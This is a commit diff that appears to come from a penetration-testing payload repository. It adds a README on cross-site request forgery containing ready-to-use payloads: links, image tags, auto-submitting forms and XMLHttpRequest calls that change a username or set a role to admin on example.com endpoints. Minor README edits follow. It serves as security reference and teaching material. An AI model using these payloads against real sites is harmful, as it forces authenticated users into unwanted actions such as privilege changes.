CSRF - First draft

CSRF injection/README.md

@@ -0,0 +1,93 @@
+# Cross-Site Request Forgery
+
+> Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. - OWASP
+
+
+## Summary
+
+* [Methodology](#methodology)
+* [Payloads](#payloads)
+
+## Methodology
+
+![CSRF_cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/CSRF%20injection/Images/CSRF-Cheatsheet.jpg)
+
+## Payloads
+
+### HTML GET – Requiring User Interaction for Proof-of-Concept
+
+```html
+<a href="http://www.example.com/api/setusername?username=CSRFd">Click Me</a>
+```
+
+### HTML GET (No User Interaction)
+
+```html
+<img src="http://www.example.com/api/setusername?username=CSRFd">
+```
+
+### HTML POST – Requiring User Interaction for Proof-of-Concept
+
+```html
+<form action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
+ <input name="username" type="hidden" value="CSRFd" />
+ <input type="submit" value="Submit Request" />
+</form>
+```
+
+### HTML POST (AutoSubmit – No User Interaction)
+
+```html
+<form id="autosubmit" action="http://www.example.com/api/setusername" enctype="text/plain" method="POST"&>
+ <input name="username" type="hidden" value="CSRFd" />
+ <input type="submit" value="Submit Request" />
+</form>
+
+<script>
+ document.getElementById("autosubmit").submit();
+</script>
+```
+
+
+### JSON GET – Simple Request
+
+```html
+<script>
+var xhr = new XMLHttpRequest();
+xhr.open("GET", "http://www.example.com/api/currentuser");
+xhr.send();
+</script>
+```
+
+### JSON POST – Simple Request
+
+```html
+<script>
+var xhr = new XMLHttpRequest();
+xhr.open("POST", "http://www.example.com/api/setrole");
+//application/json is not allowed in a simple request. text/plain is the default
+xhr.setRequestHeader("Content-Type", "text/plain");
+//You will probably want to also try one or both of these
+//xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
+//xhr.setRequestHeader("Content-Type", "multipart/form-data");
+xhr.send('{"role":admin}');
+</script>
+```
+
+### JSON POST – Complex Request
+
+```html
+<script>
+var xhr = new XMLHttpRequest();
+xhr.open("POST", "http://www.example.com/api/setrole");
+xhr.withCredentials = true;
+xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
+xhr.send('{"role":admin}');
+</script>
+```
+
+
+## References
+
+- [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/)
+- [Cross-Site Request Forgery (CSRF) - OWASP](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))

README.md

@@ -11,8 +11,9 @@ You can also contribute with a beer IRL or with `buymeacoffee.com`
 Every section contains:
 
 - README.md - vulnerability description and how to exploit it
-- Intruders - a set of files to give to Burp Intruder
-- Some exploits
+- Intruder - a set of files to give to Burp Intruder
+- Images - pictures for the README.md
+- Files - some files referenced in the README.md
 
 You might also like :
 

_template_vuln/README.md

@@ -21,6 +21,6 @@ Quick explanation
 Exploit
 ```
 
-## Reference
+## References
 
 - [Blog title - Author, Date](https://example.com)